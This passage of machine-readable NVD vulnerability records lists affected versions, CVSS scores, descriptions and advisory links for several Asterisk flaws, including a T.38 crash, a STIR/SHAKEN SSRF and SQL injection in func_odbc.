"criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
"matchCriteriaId": "27DBBC83-930A-4ECE-8C1E-47481D881B0D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E6D5A9E8-239F-492C-95AD-7CF2AB964D87",
"versionEndExcluding": "16.16.2",
"versionStartIncluding": "16.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9CA36883-D695-47A1-8CA7-2F128BFA194D",
"versionEndExcluding": "17.9.3",
"versionStartIncluding": "17.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8DEE180D-A041-42AB-AE5E-DDBD9CF0AACF",
"versionEndExcluding": "18.2.2",
"versionStartIncluding": "18.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation."
},
{
"lang": "es",
"value": "La funci\u00f3n res_pjsip_t38 en Sangoma Asterisk versiones 16.x anteriores a 16.16.2, 17.x anteriores a 17.9.3, y 18.x anteriores a 18.2.2, y Certified Asterisk anteriores a 16.8-cert7, permite a un atacante desencadenar un fallo mediante el env\u00edo de una l\u00ednea m=image y un puerto cero en una respuesta a una Re invitaci\u00f3n T.38 iniciada por Asterisk. Se trata de una reaparici\u00f3n de los s\u00edntomas de la CVE-2019-15297 pero no exactamente por el mismo motivo. El fallo es producido porque se presenta una operaci\u00f3n de append relativa a la topolog\u00eda activa, pero deber\u00eda ser en cambio una operaci\u00f3n de replace"
}
],
"id": "CVE-2021-46837",
"lastModified": "2024-11-21T06:34:47.440",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2022-08-30T07:15:07.417",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-476"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2022-26499
Vulnerability from fkie_nvd - Published: 2022-04-15 05:15 - Updated: 2024-11-21 06:54
Severity ?
Summary
An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it's possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| digium | asterisk | * | |
| digium | asterisk | * | |
| digium | asterisk | * | |
| debian | debian_linux | 10.0 | |
| debian | debian_linux | 11.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D8AB56FA-AEC6-4A6F-B420-DDBF3390379B",
"versionEndIncluding": "16.25.1",
"versionStartIncluding": "16.15.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "496A20DA-23D7-435B-8EA9-3AC585DAAB72",
"versionEndExcluding": "18.11.2",
"versionStartIncluding": "18.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C25BFFCA-90FE-475D-88A7-3BC281B830AF",
"versionEndIncluding": "19.3.1",
"versionStartIncluding": "19.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it\u0027s possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
},
{
"lang": "es",
"value": "Se ha detectado un problema de tipo SSRF en Asterisk versiones hasta 19.x. Cuando es usado STIR/SHAKEN, es posible enviar peticiones arbitrarias (como GET) a interfaces como localhost usando el encabezado Identity. Esto ha sido corregido en versiones 16.25.2, 18.11.2 y 19.3.2"
}
],
"id": "CVE-2022-26499",
"lastModified": "2024-11-21T06:54:03.990",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2022-04-15T05:15:06.640",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2022-26498
Vulnerability from fkie_nvd - Published: 2022-04-15 05:15 - Updated: 2024-11-21 06:54
Severity ?
Summary
An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| digium | asterisk | * | |
| digium | asterisk | * | |
| digium | asterisk | * | |
| debian | debian_linux | 10.0 | |
| debian | debian_linux | 11.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D8AB56FA-AEC6-4A6F-B420-DDBF3390379B",
"versionEndIncluding": "16.25.1",
"versionStartIncluding": "16.15.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "496A20DA-23D7-435B-8EA9-3AC585DAAB72",
"versionEndExcluding": "18.11.2",
"versionStartIncluding": "18.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C25BFFCA-90FE-475D-88A7-3BC281B830AF",
"versionEndIncluding": "19.3.1",
"versionStartIncluding": "19.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
},
{
"lang": "es",
"value": "Se ha detectado un problema en Asterisk versiones hasta 19.x. Cuando es usado STIR/SHAKEN, es posible descargar archivos que no son certificados. Estos archivos pod\u00edan ser mucho m\u00e1s grandes de lo que se esperaba descargar, conllevando a un agotamiento de recursos. Esto ha sido corregido en versiones 16.25.2, 18.11.2 y 19.3.2"
}
],
"id": "CVE-2022-26498",
"lastModified": "2024-11-21T06:54:03.827",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2022-04-15T05:15:06.597",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"source": "cve@mitre.org",
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-400"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2022-26651
Vulnerability from fkie_nvd - Published: 2022-04-15 05:15 - Updated: 2024-11-21 06:54
Severity ?
Summary
An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| digium | asterisk | * | |
| digium | asterisk | * | |
| digium | asterisk | * | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| debian | debian_linux | 10.0 | |
| debian | debian_linux | 11.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1533FF1D-ABC5-4F45-8FB4-7441C03422F4",
"versionEndExcluding": "16.25.2",
"versionStartIncluding": "16.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "496A20DA-23D7-435B-8EA9-3AC585DAAB72",
"versionEndExcluding": "18.11.2",
"versionStartIncluding": "18.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4FD25061-F1D0-4849-9905-CB4AEDC59363",
"versionEndExcluding": "19.3.2",
"versionStartIncluding": "19.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:-:*:*:*:*:*:*",
"matchCriteriaId": "81C3E390-8B99-4EB8-82DD-02893611209A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc1:*:*:*:*:*:*",
"matchCriteriaId": "17DB2297-1908-4F87-8046-2BAA74569D71",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc2:*:*:*:*:*:*",
"matchCriteriaId": "CEA2CC40-C2F6-4828-82F0-1B50D3E61F77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc3:*:*:*:*:*:*",
"matchCriteriaId": "32F19F43-C1E8-4B6C-9356-AF355B7320BD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc4:*:*:*:*:*:*",
"matchCriteriaId": "21D1FA32-B441-485F-8AE9-F3A394626909",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert10:*:*:*:*:*:*",
"matchCriteriaId": "B416D491-F0D0-4F9E-BEE0-236D9FFF03FE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert11:*:*:*:*:*:*",
"matchCriteriaId": "A21DB030-7BE3-4ED0-8212-7FACC715136F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert12:*:*:*:*:*:*",
"matchCriteriaId": "8BF4E88F-5400-4B79-ADBA-ECED941AF092",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert13:*:*:*:*:*:*",
"matchCriteriaId": "21C227EC-7084-4F08-AA04-271DB4561823",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert2:*:*:*:*:*:*",
"matchCriteriaId": "F7795CCF-B160-4B4F-9529-1192C11D7FDB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert3:*:*:*:*:*:*",
"matchCriteriaId": "0C5E5D0D-9EB3-40FD-8B7E-E93A95D07AB1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4:*:*:*:*:*:*",
"matchCriteriaId": "C7DFDA30-DD61-4BBC-AFE4-448BF2A4F303",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc1:*:*:*:*:*:*",
"matchCriteriaId": "142F1F89-49AC-4A0B-A273-61F697063A5A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc2:*:*:*:*:*:*",
"matchCriteriaId": "53041795-788C-4914-A2F6-41539ABE0244",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc3:*:*:*:*:*:*",
"matchCriteriaId": "FBB98E65-B2D0-49A4-8BF3-12155E3E13C9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc4:*:*:*:*:*:*",
"matchCriteriaId": "769C854C-03CD-40A9-B39B-C0CDCA8252EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert5:*:*:*:*:*:*",
"matchCriteriaId": "6D86AD6E-4E07-48B0-88D8-E18F277FFE6A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert6:*:*:*:*:*:*",
"matchCriteriaId": "7A643445-8A73-4ACC-8A96-CA8D6AC8B229",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert7:*:*:*:*:*:*",
"matchCriteriaId": "BD980324-52E2-4D3E-B8D8-52A2DB100306",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert8:*:*:*:*:*:*",
"matchCriteriaId": "4D5B8321-033A-47C5-A277-BE056C5ADB30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert9:*:*:*:*:*:*",
"matchCriteriaId": "12A2585A-A13F-4FD5-9A65-273B7D8A99C8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14."
},
{
"lang": "es",
"value": "Se ha detectado un problema en Asterisk versiones hast 19.x y Certified Asterisk versiones hasta 16.8-cert13. El m\u00f3dulo func_odbc proporciona una funcionalidad de escape posiblemente inapropiada para los caracteres de barra invertida en las consultas SQL, resultando en que los datos proporcionados por el usuario creen una consulta SQL rota o posiblemente una inyecci\u00f3n SQL. Esto ha sido corregido en versiones 16.25.2, 18.11.2 y 19.3.2, y 16.8-cert14"
}
],
"id": "CVE-2022-26651",
"lastModified": "2024-11-21T06:54:15.633",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2022-04-15T05:15:06.683",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-32558
Vulnerability from fkie_nvd - Published: 2021-07-30 14:15 - Updated: 2024-11-21 06:07
Severity ?
Summary
An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| digium | asterisk | * | |
| digium | asterisk | * | |
| digium | asterisk | * | |
| digium | asterisk | * | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| digium | certified_asterisk | 16.8 | |
| debian | debian_linux | 9.0 | |
| debian | debian_linux | 11.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2D4276A5-AE30-4AE2-9DC2-4742063B1DAA",
"versionEndExcluding": "13.38.3",
"versionStartIncluding": "13.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AEDB7BB2-CA84-4AF4-A91A-37FCDAED7E7D",
"versionEndExcluding": "16.19.1",
"versionStartIncluding": "16.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "35D9931E-4BDC-4679-A879-21C59F79E85C",
"versionEndExcluding": "17.9.4",
"versionStartIncluding": "17.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4452C0A6-3082-4F14-96B0-73CC70EF1277",
"versionEndExcluding": "18.15.1",
